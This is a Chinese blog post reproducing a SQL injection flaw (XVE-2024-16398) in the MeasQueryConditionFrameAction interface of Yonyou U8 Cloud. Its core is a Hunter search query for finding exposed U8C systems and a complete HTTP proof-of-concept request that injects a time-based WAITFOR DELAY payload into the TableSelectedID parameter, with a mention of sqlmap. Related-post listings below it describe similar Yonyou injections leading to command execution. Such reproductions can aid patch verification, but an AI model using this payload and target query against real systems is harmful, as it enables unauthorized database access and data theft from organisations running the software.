漏洞复现 用友 u8cloud measqueryconditionframeaction接口 sql注入漏洞 XVE-2024-16398

已于 2024-07-25 14:45:05 修改
阅读量182 收藏
点赞数 1
文章标签: 安全 网络安全
于 2024-07-25 14:40:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80423765/article/details/140688358
版权

漏洞复现 用友 u8cloud measqueryconditionframeaction接口 sql注入漏洞 XVE-2024-16398

hunter:
web.title="U8C"

POC:

GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasQueryConditionFrameAction&method=doCopy&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host: ip地址
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i

在这里插入图片描述
sqlmap:
在这里插入图片描述

景..
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
用友NC down/bill SQL注入漏洞复现(XVE-2024-9469)
0xSec
05-01 730
用友NC //portal/pt/erfile/down/bill接口的id参数存在SQL注入漏洞,攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
用友NC linkVoucher SQL注入漏洞复现(XVE-2024-12622)
0xSec
05-27 810
用友NC /portal/pt/yercommon/linkVoucher 接口存在SQL注入漏洞,攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
用友U8 Cloud ExportUfoFormatAction接口 SQL注入漏洞(XVE-2024-4626)(含POC)
qq_43216356的博客
04-04 350
漏洞复现用友U8 Cloud ExportUfoFormatAction接口 SQL注入漏洞(XVE-2024-4626)(含POC)
用友GRP-U8 sqcxIndex.jsp SQL注入漏洞(XVE-2024-12560)
wan___she__pi的博客
05-28 247
用友GRP-U8用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是行政事业财务领域最专业的政府财务管理软件。
用友U8 Cloud API SQL注入漏洞复现(XVE-2024-9335)
0xSec
04-16 598
用友 U8 Cloud API 接口处存在SQL注入漏洞,未授权的攻击者可通过此漏洞获取数据库权限,从而盗取用户数据,造成用户信息泄露。
漏洞复现用友NC down/bill SQL注入漏洞(XVE-2024-9469)
最新发布
siu~
06-23 404
用友NC //portal/pt/erfile/down/bill接口的id参数存在SQL注入漏洞,攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
用友GRP-U8 userInfoWeb SQL注入致RCE漏洞复现 (XVE-2024-10539)
qq_39894062的博客
05-14 525
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
用友GRP-U8 sqcxIndex.jsp SQL注入致RCE漏洞复现(XVE-2024-12560)
0xSec
05-27 515
用友GRP-U8R10行政事业内控管理软件sqcxIndex.jsp 接口处存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
用友U8 Cloud ExportUfoFormatAction SQL注入漏洞复现(XVE-2024-4626)
0xSec
04-03 439
用友U8CloudExportUfoFormatAction接口处存在SQL注入漏洞,未授权的攻击者可通过此漏洞获取数据库权限,从而盗取用户数据,造成用户信息泄露。
XVE提取工具
02-21
在IT行业中,XVE提取工具是一种专门用于处理特定格式的压缩文件或数据包的软件工具。XVE,全称为eXtended Virtual Environment,是一种专有的文件格式,通常用于存储虚拟化环境的数据,如操作系统、应用程序及其配置...
XVE视频转换器
05-09
其实解除这一限制的方法十分简单,借助一款转换视频格式的小工具XVE的帮助,就可以把XV格式文件里面的视频提取出来,成为加密前的常见格式视频,方便使用其它工具播放或传播。运行XVE的主程序后,点击“浏览”按钮,从弹出...
Nowzen.gaM5xVe
03-18
"Nowzen.gaM5xVe"看起来可能是一个特定项目或文件的命名,但没有足够的上下文来详细解释其含义。不过,我们可以深入探讨HTML的基本概念和关键知识点。 1. **HTML结构**:HTML文档通常以`<!DOCTYPE html>`开始,声明...
xv-flv转换器
05-22
XVECore.exe可能是核心解码引擎,负责解析.xv文件的内容,而XVE.exe可能是主应用程序,提供用户界面和转换逻辑。.bat文件"全部转换.bat"可能是预设的批处理脚本,用户只需一键执行,即可批量转换多个.xv文件,大大...
XVE_1.0视频转换
02-28
XVE_1.0视频转换】是一款专为处理迅雷XV格式而设计的视频转换工具。在理解和使用这款软件之前,我们需要了解几个关键概念和技术背景。 首先,XV格式是迅雷(Thunder)公司为其下载服务所采用的一种私有视频格式。...
xve迅雷视频转换器
08-24
xve迅雷视频转换器:轻松转换,享受高清流畅体验》 在数字媒体日益普及的今天,视频格式的转换成为许多用户面临的问题。不同设备、平台之间对视频格式的支持各异,这就催生了各种视频转换软件的诞生。"xve迅雷...
XVE For VistaWin 7
09-03
XVE For VistaWin 7:迅雷视频转换利器详解》 在数字化时代,多媒体文件尤其是视频内容占据了我们日常生活的很大一部分。为了更好地管理和分享这些资源,转换工具扮演了至关重要的角色。XVE For VistaWin 7是一款...
XV转换器XVE7s+
08-06
【XV转换器XVE7s+】是一款专为用户设计的视频转换工具,主要功能是将迅雷看看(XV)格式的视频文件转换成更通用的FLV格式。这款软件解决了迅雷看看视频只能在特定播放器上观看的问题,使用户能够更方便地在各种设备...
迅雷看看xv文件转换器XVE 第7版
09-27
迅雷看看xv文件转换器XVE是一款专为处理迅雷看看播放器特有的.xv格式视频文件而设计的工具。该软件的第7版引入了批量操作功能,使得用户可以一次性转换多个.xv文件,极大地提高了效率,尤其适用于需要处理大量这类...
设置无标题 android
05-02
在Android应用中,设置无标题是一种简洁和美观的设计方式,可以为用户提供更流畅的使用体验。以下是一些实现设置无标题的方法: 1. 在Android的Manifest文件中,找到对应Activity的标签,并添加”android:theme="@android:style/Theme.NoTitleBar"“属性。这样可以通过Android自带的主题去掉标题栏。 2. 使用自定义的主题,可以在样式表中添加以下代码: <style name="AppTheme" parent="Theme.AppCompat.NoActionBar"> <!-- ...其他样式... --> </style> 这种方式可以通过设置主题去除ActionBar和标题栏,同时保留其他布局元素。 3. 去掉代码中的setTitle()方法,这是一种最简单的方法,通过不设置Activity的标题来实现无标题。 以上就是三种常见的实现Android无标题的方式,开发者可以根据实际需求进行选择。值得注意的是,去除标题栏可能会影响用户的导航体验,因此在设计上需要考虑周全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值